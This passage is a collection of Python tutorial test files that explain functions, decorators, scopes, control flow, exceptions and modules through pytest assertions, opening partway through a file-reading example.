The position is computed # from adding offset to a reference point; the reference point is selected by the from_what # argument. A from_what value of 0 measures from the beginning of the file, 1 uses the current # file position, and 2 uses the end of the file as the reference point. from_what can be omitted # and defaults to 0, using the beginning of the file as the reference point. assert binary_file.seek(0) == 0 # Go to the 0th byte in the file assert binary_file.seek(6) == 6 # Go to the 6th byte in the file assert binary_file.read(1) == '6' # f.readline() reads a single line from the file; a newline character (\n) is left at the end # of the string, and is only omitted on the last line of the file if the file doesn’t end in a # newline. This makes the return value unambiguous; if f.readline() returns an empty string, # the end of the file has been reached, while a blank line is represented by '\n', a string # containing only a single newline. multi_line_file.seek(0) assert multi_line_file.readline() == 'first line\n' assert multi_line_file.readline() == 'second line\n' assert multi_line_file.readline() == 'third line' assert multi_line_file.readline() == '' multi_line_file.close() binary_file.close() File: src/functions/test_function_arbitrary_arguments.py """Arbitrary Argument Lists @see: https://docs.python.org/3/tutorial/controlflow.html#arbitrary-argument-lists Function can be called with an arbitrary number of arguments. These arguments will be wrapped up in a tuple. Before the variable number of arguments, zero or more normal arguments may occur. """ def test_function_arbitrary_arguments(): """Arbitrary Argument Lists""" # When a final formal parameter of the form **name is present, it receives a dictionary # containing all keyword arguments except for those corresponding to a formal parameter. # This may be combined with a formal parameter of the form *name which receives a tuple # containing the positional arguments beyond the formal parameter list. # (*name must occur before **name.) For example, if we define a function like this: def test_function(first_param, *arguments): """This function accepts its arguments through "arguments" tuple""" assert first_param == 'first param' assert arguments == ('second param', 'third param') test_function('first param', 'second param', 'third param') # Normally, these variadic arguments will be last in the list of formal parameters, because # they scoop up all remaining input arguments that are passed to the function. Any formal # parameters which occur after the *args parameter are ‘keyword-only’ arguments, meaning that # they can only be used as keywords rather than positional arguments. def concat(*args, sep='/'): return sep.join(args) assert concat('earth', 'mars', 'venus') == 'earth/mars/venus' assert concat('earth', 'mars', 'venus', sep='.') == 'earth.mars.venus' File: src/functions/test_function_default_arguments.py """Default Argument Values @see: https://docs.python.org/3/tutorial/controlflow.html#default-argument-values The most useful form is to specify a default value for one or more arguments. This creates a function that can be called with fewer arguments than it is defined to allow. """ def power_of(number, power=2): """ Raises number to specific power. You may notice that by default the function raises number to the power of two. 
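
    A couple of illustrative doctest-style calls (the argument values are chosen here and are not
    part of the original text):

    >>> power_of(4)
    16
    >>> power_of(2, power=3)
    8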
""" return number ** power def test_default_function_arguments(): """Test default function arguments""" # This function power_of can be called in several ways because it has default value for # the second argument. First we may call it omitting the second argument at all. assert power_of(3) == 9 # We may also want to override the second argument by using the following function calls. assert power_of(3, 2) == 9 assert power_of(3, 3) == 27 File: src/functions/test_function_scopes.py """Scopes and Namespaces. @see: https://docs.python.org/3/tutorial/classes.html#scopes-and-namespaces-example A NAMESPACE is a mapping from names to objects. Most namespaces are currently implemented as Python dictionaries, but that’s normally not noticeable in any way (except for performance), and it may change in the future. Examples of namespaces are: the set of built-in names (containing functions such as abs(), and built-in exception names); the global names in a module; and the local names in a function invocation. In a sense the set of attributes of an object also form a namespace. The important thing to know about namespaces is that there is absolutely no relation between names in different namespaces; for instance, two different modules may both define a function maximize without confusion — users of the modules must prefix it with the module name. By the way, we use the word attribute for any name following a dot — for example, in the expression z.real, real is an attribute of the object z. Strictly speaking, references to names in modules are attribute references: in the expression modname.func_name, modname is a module object and func_name is an attribute of it. In this case there happens to be a straightforward mapping between the module’s attributes and the global names defined in the module: they share the same namespace! A SCOPE is a textual region of a Python program where a namespace is directly accessible. “Directly accessible” here means that an unqualified reference to a name attempts to find the name in the namespace. Although scopes are determined statically, they are used dynamically. At any time during execution, there are at least three nested scopes whose namespaces are directly accessible: - the innermost scope, which is searched first, contains the local names. - the scopes of any enclosing functions, which are searched starting with the nearest enclosing scope, contains non-local, but also non-global names. - the next-to-last scope contains the current module’s global names. - the outermost scope (searched last) is the namespace containing built-in names. BE CAREFUL!!! ------------- Changing global or nonlocal variables from within an inner function might be a BAD practice and might lead to harder debugging and to more fragile code! Do this only if you know what you're doing. """ # pylint: disable=invalid-name test_variable = 'initial global value' def test_function_scopes(): """Scopes and Namespaces Example""" # This is an example demonstrating how to reference the different scopes and namespaces, and # how global and nonlocal affect variable binding: # pylint: disable=redefined-outer-name test_variable = 'initial value inside test function' def do_local(): # Create variable that is only accessible inside current do_local() function. # pylint: disable=redefined-outer-name test_variable = 'local value' return test_variable def do_nonlocal(): # Address the variable from outer scope and try to change it. 
# pylint: disable=redefined-outer-name nonlocal test_variable test_variable = 'nonlocal value' return test_variable def do_global(): # Address the variable from very global scope and try to change it. # pylint: disable=redefined-outer-name,global-statement global test_variable test_variable = 'global value' return test_variable # On this level currently we have access to local for test_function_scopes() function variable. assert test_variable == 'initial value inside test function' # Do local assignment. # It doesn't change global variable and variable from test_function_scopes() scope. do_local() assert test_variable == 'initial value inside test function' # Do non local assignment. # It doesn't change global variable but it does change variable # from test_function_scopes() function scope. do_nonlocal() assert test_variable == 'nonlocal value' # Do global assignment. # This one changes global variable but doesn't change variable from # test_function_scopes() function scope. do_global() assert test_variable == 'nonlocal value' def test_global_variable_access(): """Testing global variable access from within a function""" # Global value of test_variable has been already changed by do_global() function in previous # test so let's check that. # pylint: disable=global-statement global test_variable assert test_variable == 'global value' # On this example you may see how accessing and changing global variables from within inner # functions might make debugging more difficult and code to be less predictable. Since you # might have expected that test_variable should still be equal to 'initial global value' but # it was changed by "someone" and you need to know about the CONTEXT of who had changed that. # So once again access global and non local scope only if you know what you're doing otherwise # it might be considered as bad practice. File: src/functions/test_function_documentation_string.py """Documentation Strings. @see: https://docs.python.org/3/tutorial/controlflow.html#documentation-strings Here are some conventions about the content and formatting of documentation strings. The first line should always be a short, concise summary of the object’s purpose. For brevity, it should not explicitly state the object’s name or type, since these are available by other means (except if the name happens to be a verb describing a function’s operation). This line should begin with a capital letter and end with a period. If there are more lines in the documentation string, the second line should be blank, visually separating the summary from the rest of the description. The following lines should be one or more paragraphs describing the object’s calling conventions, its side effects, etc. """ def do_nothing(): """Do nothing, but document it. No, really, it doesn't do anything. """ pass def test_function_documentation_string(): """Test documentation string.""" # The Python parser does not strip indentation from multi-line string literals in Python, so # tools that process documentation have to strip indentation if desired. This is done using the # following convention. The first non-blank line after the first line of the string determines # the amount of indentation for the entire documentation string. (We can’t use the first line # since it is generally adjacent to the string’s opening quotes so its indentation is not # apparent in the string literal.) Whitespace “equivalent” to this indentation is then stripped # from the start of all lines of the string. 
Lines that are indented less should not occur, but # if they occur all their leading whitespace should be stripped. Equivalence of whitespace # should be tested after expansion of tabs (to 8 spaces, normally). assert do_nothing.__doc__ == """Do nothing, but document it. No, really, it doesn't do anything. """ File: src/functions/test_function_annotations.py """Function Annotations. @see: https://docs.python.org/3/tutorial/controlflow.html#function-annotations Function annotations are completely optional metadata information about the types used by user-defined functions. Annotations are stored in the __annotations__ attribute of the function as a dictionary and have no effect on any other part of the function. Parameter annotations are defined by a colon after the parameter name, followed by an expression evaluating to the value of the annotation. Return annotations are defined by a literal ->, followed by an expression, between the parameter list and the colon denoting the end of the def statement. """ def breakfast(ham: str, eggs: str = 'eggs') -> str: """Breakfast creator. This function has a positional argument, a keyword argument, and the return value annotated. """ return ham + ' and ' + eggs def test_function_annotations(): """Function Annotations.""" assert breakfast.__annotations__ == {'eggs': str, 'ham': str, 'return': str} File: src/functions/test_lambda_expressions.py """Lambda Expressions @see: https://docs.python.org/3/tutorial/controlflow.html#lambda-expressions Small anonymous functions can be created with the lambda keyword. Lambda functions can be used wherever function objects are required. They are syntactically restricted to a single expression. Semantically, they are just syntactic sugar for a normal function definition. Like nested function definitions, lambda functions can reference variables from the containing scope. """ def test_lambda_expressions(): """Lambda Expressions""" # This function returns the sum of its two arguments: lambda a, b: a+b # Like nested function definitions, lambda functions can reference variables from the # containing scope. def make_increment_function(delta): """This example uses a lambda expression to return a function""" return lambda number: number + delta increment_function = make_increment_function(42) assert increment_function(0) == 42 assert increment_function(1) == 43 assert increment_function(2) == 44 # Another use of lambda is to pass a small function as an argument. pairs = [(1, 'one'), (2, 'two'), (3, 'three'), (4, 'four')] # Sort pairs by text key. pairs.sort(key=lambda pair: pair[1]) assert pairs == [(4, 'four'), (1, 'one'), (3, 'three'), (2, 'two')] File: src/functions/test_function_definition.py """Function Definition @see: https://docs.python.org/3/tutorial/controlflow.html#defining-functions @see: https://www.thecodeship.com/patterns/guide-to-python-function-decorators/ The keyword def introduces a function definition. It must be followed by the function name and the parenthesized list of formal parameters. The statements that form the body of the function start at the next line, and must be indented. """ def fibonacci_function_example(number_limit): """Generate a Fibonacci series up to number_limit. The first statement of the function body can optionally be a string literal; this string literal is the function’s documentation string, or docstring. 
There are tools which use docstrings to automatically produce online or printed documentation, or to let the user interactively browse through code; it’s good practice to include docstrings in code that you write, so make a habit of it. """ # The execution of a function introduces a new symbol table used for the local variables of the # function. More precisely, all variable assignments in a function store the value in the local # symbol table; whereas variable references first look in the local symbol table, then in the # local symbol tables of enclosing functions, then in the global symbol table, and finally in # the table of built-in names. Thus, global variables cannot be directly assigned a value # within a function (unless named in a global statement), although they may be referenced. fibonacci_list = [] previous_number, current_number = 0, 1 while previous_number < number_limit: # The statement result.append(a) calls a method of the list object result. A method is a # function that ‘belongs’ to an object and is named obj.methodname, where obj is some # object (this may be an expression), and methodname is the name of a method that is # defined by the object’s type. Different types define different methods. Methods of # different types may have the same name without causing ambiguity. (It is possible to # define your own object types and methods, using classes, see Classes) The method # append() shown in the example is defined for list objects; it adds a new element at # the end of the list. In this example it is equivalent to result = result + [a], but # more efficient. fibonacci_list.append(previous_number) # This is multiple assignment statement. We make current number to be previous one and the # sum of previous and current to be a new current. previous_number, current_number = current_number, previous_number + current_number # The return statement returns with a value from a function. return without an expression # argument returns None. Falling off the end of a function also returns None. return fibonacci_list def test_function_definition(): """Function Definition""" # Now call the function we just defined. assert fibonacci_function_example(300) == [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233] # A function definition introduces the function name in the current symbol table. The value of # the function name has a type that is recognized by the interpreter as a user-defined function. # This value can be assigned to another name which can then also be used as a function. This # serves as a general renaming mechanism fibonacci_function_clone = fibonacci_function_example assert fibonacci_function_clone(300) == [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233] # In Python, functions are first class citizens, they are objects and that means we can do a # lot of useful stuff with them. # Assign functions to variables. def greet(name): return 'Hello, ' + name greet_someone = greet assert greet_someone('John') == 'Hello, John' # Define functions inside other functions. def greet_again(name): def get_message(): return 'Hello, ' result = get_message() + name return result assert greet_again('John') == 'Hello, John' # Functions can be passed as parameters to other functions. def greet_one_more(name): return 'Hello, ' + name def call_func(func): other_name = 'John' return func(other_name) assert call_func(greet_one_more) == 'Hello, John' # Functions can return other functions. In other words, functions generating other functions. 
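    # (Illustrative aside, not from the original text.) The same idea in its smallest possible
    # form: a factory that returns a freshly created lambda on every call.
    def make_constant_function(value):
        return lambda: value

    assert make_constant_function(7)() == 7

    # A fuller example follows.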
def compose_greet_func(): def get_message(): return 'Hello there!' return get_message greet_function = compose_greet_func() assert greet_function() == 'Hello there!' # Inner functions have access to the enclosing scope. # More commonly known as a closure. A very powerful pattern that we will come across while # building decorators. Another thing to note, Python only allows read access to the outer # scope and not assignment. Notice how we modified the example above to read a "name" argument # from the enclosing scope of the inner function and return the new function. def compose_greet_func_with_closure(name): def get_message(): return 'Hello there, ' + name + '!' return get_message greet_with_closure = compose_greet_func_with_closure('John') assert greet_with_closure() == 'Hello there, John!' File: src/functions/test_function_keyword_arguments.py """Keyword Arguments @see: https://docs.python.org/3/tutorial/controlflow.html#keyword-arguments Functions can be called using keyword arguments of the form kwarg=value. """ import pytest def parrot(voltage, state='a stiff', action='voom', parrot_type='Norwegian Blue'): """Example of multi-argument function This function accepts one required argument (voltage) and three optional arguments (state, action, and type). """ message = 'This parrot wouldn\'t ' + action + ' ' message += 'if you put ' + str(voltage) + ' volts through it. ' message += 'Lovely plumage, the ' + parrot_type + '. ' message += 'It\'s ' + state + '!' return message def test_function_keyword_arguments(): """Test calling function with specifying keyword arguments""" # The parrot function accepts one required argument (voltage) and three optional arguments # (state, action, and type). This function can be called in any of the following ways: message = ( "This parrot wouldn't voom if you put 1000 volts through it. " "Lovely plumage, the Norwegian Blue. " "It's a stiff!" ) # 1 positional argument assert parrot(1000) == message # 1 keyword argument assert parrot(voltage=1000) == message message = ( "This parrot wouldn't VOOOOOM if you put 1000000 volts through it. " "Lovely plumage, the Norwegian Blue. " "It's a stiff!" ) # 2 keyword arguments assert parrot(voltage=1000000, action='VOOOOOM') == message # 2 keyword arguments assert parrot(action='VOOOOOM', voltage=1000000) == message # 3 positional arguments message = ( "This parrot wouldn't jump if you put 1000000 volts through it. " "Lovely plumage, the Norwegian Blue. " "It's bereft of life!" ) assert parrot(1000000, 'bereft of life', 'jump') == message # 1 positional, 1 keyword message = ( "This parrot wouldn't voom if you put 1000 volts through it. " "Lovely plumage, the Norwegian Blue. " "It's pushing up the daisies!" ) assert parrot(1000, state='pushing up the daisies') == message # But all the following calls would be invalid. with pytest.raises(Exception): # Required argument missing. # pylint: disable=no-value-for-parameter parrot() # Non-keyword argument after a keyword argument. # parrot(voltage=5.0, 'dead') with pytest.raises(Exception): # pylint: disable=redundant-keyword-arg parrot(110, voltage=220) with pytest.raises(Exception): # unknown keyword argument # pylint: disable=unexpected-keyword-arg,no-value-for-parameter parrot(actor='John Cleese') # In a function call, keyword arguments must follow positional arguments. All the keyword # arguments passed must match one of the arguments accepted by the function (e.g. actor is not # a valid argument for the parrot function), and their order is not important. 
This also # includes non-optional arguments (e.g. parrot(voltage=1000) is valid too). No argument may # receive a value more than once. Here’s an example that fails due to this restriction: def function_with_one_argument(number): return number with pytest.raises(Exception): # pylint: disable=redundant-keyword-arg function_with_one_argument(0, number=0) # When a final formal parameter of the form **name is present, it receives a dictionary # containing all keyword arguments except for those corresponding to a formal parameter. # This may be combined with a formal parameter of the form *name which receives a tuple # containing the positional arguments beyond the formal parameter list. # (*name must occur before **name.) For example, if we define a function like this: def test_function(first_param, *arguments, **keywords): """This function accepts its arguments through "arguments" tuple and keywords dictionary.""" assert first_param == 'first param' assert arguments == ('second param', 'third param') assert keywords == { 'fourth_param_name': 'fourth named param', 'fifth_param_name': 'fifth named param' } test_function( 'first param', 'second param', 'third param', fourth_param_name='fourth named param', fifth_param_name='fifth named param', ) File: src/functions/test_function_unpacking_arguments.py """Unpacking Argument Lists @see: https://docs.python.org/3/tutorial/controlflow.html#unpacking-argument-lists Unpacking arguments may be executed via * and ** operators. See below for further details. """ def test_function_unpacking_arguments(): """Unpacking Argument Lists""" # The situation may occur when the arguments are already in a list or tuple but need to be # unpacked for a function call requiring separate positional arguments. For instance, the # built-in range() function expects separate start and stop arguments. If they are not # available separately, write the function call with the *-operator to unpack the arguments out # of a list or tuple: # Normal call with separate arguments: assert list(range(3, 6)) == [3, 4, 5] # Call with arguments unpacked from a list. arguments_list = [3, 6] assert list(range(*arguments_list)) == [3, 4, 5] # In the same fashion, dictionaries can deliver keyword arguments with the **-operator: def function_that_receives_names_arguments(first_word, second_word): return first_word + ', ' + second_word + '!' arguments_dictionary = {'first_word': 'Hello', 'second_word': 'World'} assert function_that_receives_names_arguments(**arguments_dictionary) == 'Hello, World!' File: src/functions/test_function_decorators.py """Function Decorators. @see: https://www.thecodeship.com/patterns/guide-to-python-function-decorators/ Function decorators are simply wrappers to existing functions. In the context of design patterns, decorators dynamically alter the functionality of a function, method or class without having to directly use subclasses. This is ideal when you need to extend the functionality of functions that you don't want to modify. We can implement the decorator pattern anywhere, but Python facilitates the implementation by providing much more expressive features and syntax for that. """ def test_function_decorators(): """Function Decorators.""" # Function decorators are simply wrappers to existing functions. Putting the ideas mentioned # above together, we can build a decorator. In this example let's consider a function that # wraps the string output of another function by p tags. # This is the function that we want to decorate. 
def greeting(name): return "Hello, {0}!".format(name) # This function decorates another functions output with <p> tag. def decorate_with_p(func): def function_wrapper(name): return "<p>{0}</p>".format(func(name)) return function_wrapper # Now, let's call our decorator and pass the function we want decorate to it. my_get_text = decorate_with_p(greeting) # Here we go, we've just decorated the function output without changing the function itself. assert my_get_text('John') == '<p>Hello, John!</p>' # With decorator. assert greeting('John') == 'Hello, John!' # Without decorator. # Now, Python makes creating and using decorators a bit cleaner and nicer for the programmer # through some syntactic sugar There is a neat shortcut for that, which is to mention the # name of the decorating function before the function to be decorated. The name of the # decorator should be prepended with an @ symbol. @decorate_with_p def greeting_with_p(name): return "Hello, {0}!".format(name) assert greeting_with_p('John') == '<p>Hello, John!</p>' # Now let's consider we wanted to decorate our greeting function by one more functions to wrap a # div the string output. # This will be our second decorator. def decorate_with_div(func): def function_wrapper(text): return "<div>{0}</div>".format(func(text)) return function_wrapper # With the basic approach, decorating get_text would be along the lines of # greeting_with_div_p = decorate_with_div(decorate_with_p(greeting_with_p)) # With Python's decorator syntax, same thing can be achieved with much more expressive power. @decorate_with_div @decorate_with_p def greeting_with_div_p(name): return "Hello, {0}!".format(name) assert greeting_with_div_p('John') == '<div><p>Hello, John!</p></div>' # One important thing to notice here is that the order of setting our decorators matters. # If the order was different in the example above, the output would have been different. # Passing arguments to decorators. # Looking back at the example before, you can notice how redundant the decorators in the # example are. 2 decorators(decorate_with_div, decorate_with_p) each with the same # functionality but wrapping the string with different tags. We can definitely do much better # than that. Why not have a more general implementation for one that takes the tag to wrap # with as a string? Yes please! def tags(tag_name): def tags_decorator(func): def func_wrapper(name): return "<{0}>{1}</{0}>".format(tag_name, func(name)) return func_wrapper return tags_decorator @tags('div') @tags('p') def greeting_with_tags(name): return "Hello, {0}!".format(name) assert greeting_with_tags('John') == '<div><p>Hello, John!</p></div>' File: src/control_flow/test_while.py """WHILE statement @see: https://docs.python.org/3/tutorial/controlflow.html @see: https://docs.python.org/3/reference/compound_stmts.html#the-while-statement The while loop executes as long as the condition remains true. In Python, like in C, any non-zero integer value is true; zero is false. The condition may also be a string or list value, in fact any sequence; anything with a non-zero length is true, empty sequences are false. The test used in the example is a simple comparison. The standard comparison operators are written the same as in C: < (less than), > (greater than), == (equal to), <= (less than or equal to), >= (greater than or equal to) and != (not equal to). """ def test_while_statement(): """WHILE statement""" # Let's raise the number to certain power using while loop. 
number = 2 power = 5 result = 1 while power > 0: result *= number power -= 1 # 2^5 = 32 assert result == 32 File: src/control_flow/test_try.py """TRY statement @see: https://www.w3schools.com/python/python_try_except.asp "try" statement is used for exception handling. When an error occurs, or exception as we call it, Python will normally stop and generate an error message. These exceptions can be handled using the try statement. The "try" block lets you test a block of code for errors. The "except" block lets you handle the error. The "else" block lets you execute the code if no errors were raised. The "finally" block lets you execute code, regardless of the result of the try- and except blocks. """ def test_try(): """TRY statement""" # The try block will generate an error, because x is not defined: exception_has_been_caught = False try: # pylint: disable=undefined-variable print(not_existing_variable) except NameError: exception_has_been_caught = True assert exception_has_been_caught # You can define as many exception blocks as you want, e.g. if you want to execute a special # block of code for a special kind of error: exception_message = '' try: # pylint: disable=undefined-variable print(not_existing_variable) except NameError: exception_message = 'Variable is not defined' assert exception_message == 'Variable is not defined' # You can use the else keyword to define a block of code to be executed # if no errors were raised. message = '' # pylint: disable=broad-except try: message += 'Success.' except NameError: message += 'Something went wrong.' else: message += 'Nothing went wrong.' assert message == 'Success.Nothing went wrong.' # The finally block, if specified, will be executed regardless if the try block raises an # error or not. message = '' try: # pylint: undefined-variable print(not_existing_variable) # noqa: F821 except NameError: message += 'Something went wrong.' finally: message += 'The "try except" is finished.' assert message == 'Something went wrong.The "try except" is finished.' File: src/control_flow/test_break.py """BREAK statement @see: https://docs.python.org/3/tutorial/controlflow.html The break statement, like in C, breaks out of the innermost enclosing "for" or "while" loop. """ def test_break_statement(): """BREAK statement""" # Let's terminate the loop in case if we've found the number we need in a range from 0 to 100. number_to_be_found = 42 # This variable will record how many time we've entered the "for" loop. number_of_iterations = 0 for number in range(100): if number == number_to_be_found: # Break here and don't continue the loop. break else: number_of_iterations += 1 # We need to make sure that break statement has terminated the loop once it found the number. assert number_of_iterations == 42 File: src/control_flow/test_for.py """FOR statement @see: https://docs.python.org/3/tutorial/controlflow.html The for statement in Python differs a bit from what you may be used to in C or Pascal. Rather than always iterating over an arithmetic progression of numbers (like in Pascal), or giving the user the ability to define both the iteration step and halting condition (as C), Python’s for statement iterates over the items of any sequence (a list or a string), in the order that they appear in the sequence. 
For example (no pun intended): """ # pylint: disable=too-many-locals def test_for_statement(): """FOR statement""" # Measure some strings: words = ['cat', 'window', 'defenestrate'] words_length = 0 for word in words: words_length += len(word) # "cat" length is 3 # "window" length is 6 # "defenestrate" length is 12 assert words_length == (3 + 6 + 12) # If you need to modify the sequence you are iterating over while inside the loop # (for example to duplicate selected items), it is recommended that you first make a copy. # Iterating over a sequence does not implicitly make a copy. The slice notation makes this # especially convenient: for word in words[:]: # Loop over a slice copy of the entire list. if len(word) > 6: words.insert(0, word) # Otherwise with for w in words:, the example would attempt to create an infinite list, # inserting defenestrate over and over again. assert words == ['defenestrate', 'cat', 'window', 'defenestrate'] # If you do need to iterate over a sequence of numbers, the built-in function range() comes in # handy. It generates arithmetic progressions: iterated_numbers = [] for number in range(5): iterated_numbers.append(number) assert iterated_numbers == [0, 1, 2, 3, 4] # To iterate over the indices of a sequence, you can combine range() and len() as follows: words = ['Mary', 'had', 'a', 'little', 'lamb'] concatenated_string = '' # pylint: disable=consider-using-enumerate for word_index in range(len(words)): concatenated_string += words[word_index] + ' ' assert concatenated_string == 'Mary had a little lamb ' # Or simply use enumerate(). concatenated_string = '' for word_index, word in enumerate(words): concatenated_string += word + ' ' assert concatenated_string == 'Mary had a little lamb ' # When looping through dictionaries, the key and corresponding value can be retrieved at the # same time using the items() method. knights_names = [] knights_properties = [] knights = {'gallahad': 'the pure', 'robin': 'the brave'} for key, value in knights.items(): knights_names.append(key) knights_properties.append(value) assert knights_names == ['gallahad', 'robin'] assert knights_properties == ['the pure', 'the brave'] # When looping through a sequence, the position index and corresponding value can be retrieved # at the same time using the enumerate() function indices = [] values = [] for index, value in enumerate(['tic', 'tac', 'toe']): indices.append(index) values.append(value) assert indices == [0, 1, 2] assert values == ['tic', 'tac', 'toe'] # To loop over two or more sequences at the same time, the entries can be paired with # the zip() function. questions = ['name', 'quest', 'favorite color'] answers = ['lancelot', 'the holy grail', 'blue'] combinations = [] for question, answer in zip(questions, answers): combinations.append('What is your {0}? It is {1}.'.format(question, answer)) assert combinations == [ 'What is your name? It is lancelot.', 'What is your quest? It is the holy grail.', 'What is your favorite color? It is blue.', ] def test_range_function(): """Range function If you do need to iterate over a sequence of numbers, the built-in function range() comes in handy. It generates arithmetic progressions. In many ways the object returned by range() behaves as if it is a list, but in fact it isn’t. It is an object which returns the successive items of the desired sequence when you iterate over it, but it doesn’t really make the list, thus saving space. 
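
    An illustrative aside (not from the original text): echoing the object shows that no list has
    been built, yet iterating over it still produces the numbers.

    >>> range(5)
    range(0, 5)
    >>> sum(range(5))
    10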
We say such an object is iterable, that is, suitable as a target for functions and constructs that expect something from which they can obtain successive items until the supply is exhausted. We have seen that the for statement is such an iterator. The function list() is another; it creates lists from iterables: """ assert list(range(5)) == [0, 1, 2, 3, 4] # The given end point is never part of the generated sequence; range(10) generates 10 values, # the legal indices for items of a sequence of length 10. It is possible to let the range start # at another number, or to specify a different increment (even negative; sometimes this is # called the ‘step’): assert list(range(5, 10)) == [5, 6, 7, 8, 9] assert list(range(0, 10, 3)) == [0, 3, 6, 9] assert list(range(-10, -100, -30)) == [-10, -40, -70] File: src/control_flow/test_if.py """IF statement @see: https://docs.python.org/3/tutorial/controlflow.html There can be zero or more elif parts, and the else part is optional. The keyword ‘elif’ is short for ‘else if’, and is useful to avoid excessive indentation. An if … elif … elif … sequence is a substitute for the switch or case statements found in other languages. """ def test_if_statement(): """IF statement""" number = 15 conclusion = '' if number < 0: conclusion = 'Number is less than zero' elif number == 0: conclusion = 'Number equals to zero' elif number < 1: conclusion = 'Number is greater than zero but less than one' else: conclusion = 'Number bigger than or equal to one' assert conclusion == 'Number bigger than or equal to one' File: src/control_flow/test_continue.py """CONTINUE statement @see: https://docs.python.org/3/tutorial/controlflow.html The continue statement is borrowed from C, continues with the next iteration of the loop. """ def test_continue_statement(): """CONTINUE statement in FOR loop""" # Let's # This list will contain only even numbers from the range. even_numbers = [] # This list will contain every other numbers (in this case - ods). rest_of_the_numbers = [] for number in range(0, 10): # Check if remainder after division is zero (which would mean that number is even). if number % 2 == 0: even_numbers.append(number) # Stop current loop iteration and go to the next one immediately. continue rest_of_the_numbers.append(number) assert even_numbers == [0, 2, 4, 6, 8] assert rest_of_the_numbers == [1, 3, 5, 7, 9] File: src/modules/test_packages.py """Packages. @see: https://docs.python.org/3/tutorial/modules.html#packages Packages are a way of structuring Python’s module namespace by using “dotted module names”. For example, the module name A.B designates a submodule named B in a package named A. Just like the use of modules saves the authors of different modules from having to worry about each other’s global variable names, the use of dotted module names saves the authors of multi-module packages like NumPy or Pillow from having to worry about each other’s module names. The __init__.py files are required to make Python treat the directories as containing packages; this is done to prevent directories with a common name, such as string, from unintentionally hiding valid modules that occur later on the module search path. In the simplest case, __init__.py can just be an empty file, but it can also execute initialization code for the package or set the __all__ variable, described later. 
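
For example, the test below relies on a package laid out roughly like this (a sketch of the
sound_package that the imports further down assume):

    sound_package/
        __init__.py
        effects/
            __init__.py
            echo.py          # defines echo_function()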
When the interpreter executes the import statement, it searches for module in a list of directories assembled from the following sources: - The directory from which the input script was run or the current directory if the interpreter is being run interactively - The list of directories contained in the PYTHONPATH environment variable, if it is set. (The format for PYTHONPATH is OS-dependent but should mimic the PATH environment variable.) - An installation-dependent list of directories configured at the time Python is installed The resulting search path is accessible in the Python variable sys.path, which is obtained from a module named sys: >>> import sys >>> sys.path @see: https://realpython.com/python-modules-packages/ """ # Users of the package can import individual modules from the package, for example. import sound_package.effects.echo # An alternative way of importing the submodule is: # pylint: disable=reimported from sound_package.effects import echo # Yet another variation is to import the desired function or variable directly: from sound_package.effects.echo import echo_function # Note that when using from package import item, the item can be either a submodule (or subpackage) # of the package, or some other name defined in the package, like a function, class or variable. # The import statement first tests whether the item is defined in the package; if not, it assumes # it is a module and attempts to load it. If it fails to find it, an ImportError exception is # raised. # Contrarily, when using syntax like import item.subitem.subsubitem, each item except for the last # must be a package; the last item can be a module or a package but can’t be a class or function or # variable defined in the previous item. def test_packages(): """Packages.""" assert sound_package.effects.echo.echo_function() == 'Do echo effect' assert echo.echo_function() == 'Do echo effect' assert echo_function() == 'Do echo effect' File: src/modules/fibonacci_module.py """Fibonacci numbers module. @see: https://docs.python.org/3/tutorial/modules.html A module is a file containing Python definitions and statements. The file name is the module name with the suffix .py appended. Within a module, the module’s name (as a string) is available as the value of the global variable __name__. """ def fibonacci_at_position(position): """Return Fibonacci number at specified position""" current_position = 0 previous_number, current_number = 0, 1 while current_position < position: current_position += 1 previous_number, current_number = current_number, previous_number + current_number return previous_number def fibonacci_smaller_than(limit): """Return Fibonacci series up to limit""" result = [] previous_number, current_number = 0, 1 while previous_number < limit: result.append(previous_number) previous_number, current_number = current_number, previous_number + current_number return result # When you run a Python module with: # # >>> python fibonacci.py <arguments> # # the code in the module will be executed, just as if you imported it, but with # the __name__ set to "__main__". That means that by adding this code at the end of your module # you can make the file usable as a script as well as an importable module, because the code that # parses the command line only runs if the module is executed as the “main” file: # # >>> python fibonacci.py 50 if __name__ == '__main__': import sys print(fibonacci_smaller_than(int(sys.argv[1]))) File: src/modules/test_modules.py """Modules. 
@see: https://docs.python.org/3/tutorial/modules.html As your program gets longer, you may want to split it into several files for easier maintenance. You may also want to use a handy function that you’ve written in several programs without copying its definition into each program. To support this, Python has a way to put definitions in a file and use them in a script or in an interactive instance of the interpreter. Such a file is called a module; definitions from a module can be imported into other modules or into the main module (the collection of variables that you have access to in a script executed at the top level and in calculator mode). A module is a file containing Python definitions and statements. The file name is the module name with the suffix .py appended. Within a module, the module’s name (as a string) is available as the value of the global variable __name__. When the interpreter executes the import statement, it searches for module in a list of directories assembled from the following sources: - The directory from which the input script was run or the current directory if the interpreter is being run interactively - The list of directories contained in the PYTHONPATH environment variable, if it is set. (The format for PYTHONPATH is OS-dependent but should mimic the PATH environment variable.) - An installation-dependent list of directories configured at the time Python is installed The resulting search path is accessible in the Python variable sys.path, which is obtained from a module named sys: >>> import sys >>> sys.path @see: https://realpython.com/python-modules-packages/ """ # This does not enter the names of the functions defined in fibonacci_module directly in the # current symbol table; it only enters the module name fibonacci_module there. import fibonacci_module # There is a variant of the import statement that imports names from a module directly into the # importing module’s symbol table. For example: # pylint: disable=reimported from fibonacci_module import fibonacci_at_position, fibonacci_smaller_than # There is even a variant to import all names that a module defines. This imports all names except # those beginning with an underscore (_). In most cases Python programmers do not use this facility # since it introduces an unknown set of names into the interpreter, possibly hiding some things you # have already defined. # >>> from fibonacci_module import * # If the module name is followed by as, then the name following as is bound directly to the # imported module: import fibonacci_module as fibonacci_module_renamed # It can also be used when utilising from with similar effects: from fibonacci_module import fibonacci_at_position as fibonacci_at_position_renamed # When a module named spam is imported, the interpreter first searches for a built-in module with # that name. If not found, it then searches for a file named spam.py in a list of directories # given by the variable sys.path. sys.path is initialized from these locations: # # - The directory containing the input script (or the current directory when no file is specified). # - PYTHONPATH (a list of directory names, with the same syntax as the shell variable PATH). # - The installation-dependent default. 
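
# A small illustrative addition (a sketch, not part of the original file): the module search
# path described above is exposed as sys.path, which is an ordinary Python list and can be
# inspected (or, if really necessary, extended) at runtime.
import sys


def test_module_search_path():
    """sys.path is a plain list of directory name strings."""
    assert isinstance(sys.path, list)
    assert all(isinstance(path_entry, str) for path_entry in sys.path)
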
